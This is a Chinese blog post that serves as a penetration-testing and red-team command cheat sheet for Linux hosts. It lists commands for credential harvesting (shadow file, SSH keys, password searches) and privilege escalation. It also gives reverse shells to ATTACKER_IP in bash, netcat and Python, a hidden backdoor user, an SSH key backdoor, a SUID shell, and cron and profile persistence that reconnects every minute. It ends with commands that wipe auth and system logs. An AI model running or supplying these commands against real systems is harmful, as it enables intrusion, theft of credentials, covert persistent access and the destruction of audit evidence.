晏秋的窝
渗透测试常用命令
2025-07-28
渗透测试
00
请注意,本文编写于 130 天前,最后修改于 130 天前,其中某些信息可能已经过时。

目录

1️⃣ 系统信息收集
2️⃣ 网络信息收集
3️⃣ 用户与凭据搜集
4️⃣ 文件系统与敏感信息
5️⃣ 提权相关命令
6️⃣ 后门维持与反弹 Shell
反弹 Shell 命令
创建隐藏用户
添加 SSH 后门
7️⃣ 文件传输
8️⃣ 日志清理
9️⃣ 权限维持技巧
🔟 常用提权工具 (辅助命令)

涵盖信息收集、提权、后门维持、清理痕迹等环节,方便在渗透测试和红队工作中快速使用。

1️⃣ 系统信息收集

命令说明
uname -a系统内核及架构信息
cat /etc/os-release发行版信息
hostname主机名
id当前用户 UID、GID
whoami当前用户名
groups查看所属组
sudo -l查看可用 sudo 权限(提权关键)
env查看环境变量
history历史命令记录(凭据搜集)
last最近登录记录

2️⃣ 网络信息收集

命令说明
ip addr查看 IP 地址和网卡
ip route查看路由表
ss -tulwn / netstat -tulnp查看监听端口
lsof -i查看网络连接和进程
tcpdump -i eth0抓包分析
arp -a查看 ARP 缓存
dig domain / nslookup domainDNS 查询
curl -I http://target查看 HTTP 头
wget http://target/file下载文件

3️⃣ 用户与凭据搜集

命令说明
cat /etc/passwd所有系统用户
cat /etc/shadow密码哈希(需 root)
grep -rnw '/' -e 'password'搜索明文密码
find / -name '*.pem' 2>/dev/null搜索私钥文件
cat ~/.ssh/id_rsa当前用户 SSH 私钥
find / -perm -4000 -type f 2>/dev/null查找 SUID 提权程序

4️⃣ 文件系统与敏感信息

命令说明
find / -name config.php 2>/dev/null搜索网站配置文件
grep -r "DB_PASSWORD" /var/www/搜索数据库凭据
ls -la /home/*查看用户主目录
cat /root/.bash_historyRoot 历史命令
find /tmp /var/tmp /dev/shm -type f查找可疑临时文件

5️⃣ 提权相关命令

命令说明
sudo -l查看可执行 sudo 命令
find / -perm -4000 -type f 2>/dev/nullSUID 文件
find / -perm -2000 -type f 2>/dev/nullSGID 文件
getcap -r / 2>/dev/null查找 Capabilities 提权点
`ps auxgrep root`查看 Root 权限进程
cat /etc/crontab定时任务提权点
cat /etc/sudoerssudo 权限配置
ls -al /etc/passwd /etc/shadow检查文件权限

6️⃣ 后门维持与反弹 Shell

反弹 Shell 命令

bash
# Bash
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1

# Netcat
nc -e /bin/bash ATTACKER_IP PORT

# Python
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("ATTACKER_IP",PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

创建隐藏用户

bash
useradd backdoor -m -s /bin/bash
echo "backdoor:password" | chpasswd

添加 SSH 后门

bash
mkdir -p ~/.ssh
echo "ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

7️⃣ 文件传输

命令说明
wget http://attacker/file下载文件
curl -O http://attacker/file下载文件
scp file attacker@host:/path上传文件
base64 file > file.b64编码文件传输
base64 -d file.b64 > file解码还原文件

8️⃣ 日志清理

命令说明
history -c清空当前用户历史命令
echo > ~/.bash_history清空历史记录文件
rm -f /var/log/auth.log删除身份验证日志
truncate -s 0 /var/log/syslog清空系统日志
find /var/log -type f -exec truncate -s 0 {} \;批量清空日志

9️⃣ 权限维持技巧

命令说明
echo "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1" >> /etc/profile登录后自动反弹
crontab -e定时任务执行后门脚本
`echo "* * * * * bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"crontab -`每分钟反弹
ln -s /bin/bash /tmp/rootbash && chmod +s /tmp/rootbashSUID 后门

🔟 常用提权工具 (辅助命令)

  • wget / curl:下载提权脚本(如 LinPEAS
  • chmod +x script.sh && ./script.sh:运行提权扫描
  • python -m SimpleHTTPServer 80:快速起本地 HTTP 服务传文件
  • nc -lvnp 4444:监听反弹 shell

本文作者:晏秋

本文链接:

版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!